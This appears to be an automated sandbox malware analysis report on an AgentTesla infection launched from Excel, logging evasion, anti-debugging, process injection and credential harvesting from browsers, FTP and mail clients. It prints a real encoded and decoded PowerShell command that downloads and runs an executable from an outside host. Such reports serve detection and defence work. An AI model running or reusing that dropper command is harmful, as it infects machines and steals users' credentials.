                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWindow / User API: threadDelayed 9628
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2512Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 3044Thread sleep time: -360000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1776Thread sleep time: -12912720851596678s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1776Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1484Thread sleep count: 9628 > 30
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1484Thread sleep count: 70 > 30
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1776Thread sleep count: 126 > 30
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: tNDFx.exe, 00000006.00000002.2134184751.00000000058E8000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

                      Anti Debugging:

                      barindex
                      Contains functionality to hide a thread from the debuggerShow sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 6_2_001E9FDC NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,001EA6BF,00000000,00000000
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Yara detected Powershell download and executeShow sources
                      Source: Yara matchFile source: 00000004.00000002.2109712096.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1320, type: MEMORY
                      Encrypted powershell cmdline option foundShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded (New-Object Net.WebClient).DownloadFile('http://specfloors.net/dev/income.exe',($env:appdata)+'\tNDFx.exe');Start-Sleep 2; Start-Process $env:appdata\tNDFx.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded (New-Object Net.WebClient).DownloadFile('http://specfloors.net/dev/income.exe',($env:appdata)+'\tNDFx.exe');Start-Sleep 2; Start-Process $env:appdata\tNDFx.exe
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeMemory written: C:\Users\user\AppData\Roaming\tNDFx.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe 'C:\Users\user\AppData\Roaming\tNDFx.exe'
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exe
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                      Source: tNDFx.exe, 0000000B.00000002.2351497719.0000000000C20000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: tNDFx.exe, 0000000B.00000002.2351497719.0000000000C20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: tNDFx.exe, 0000000B.00000002.2351497719.0000000000C20000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeQueries volume information: C:\Users\user\AppData\Roaming\tNDFx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeQueries volume information: C:\Users\user\AppData\Roaming\tNDFx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351624860.000000000221A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2134883837.0000000006A8F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tNDFx.exe PID: 2484, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tNDFx.exe PID: 2288, type: MEMORY
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6a8f2b8.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6ac52d8.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.tNDFx.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6ac52d8.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6a8f2b8.17.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Yara matchFile source: 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tNDFx.exe PID: 2484, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351624860.000000000221A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2134883837.0000000006A8F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tNDFx.exe PID: 2484, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tNDFx.exe PID: 2288, type: MEMORY
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6a8f2b8.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6ac52d8.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.tNDFx.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6ac52d8.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6a8f2b8.17.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1Input Capture11System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
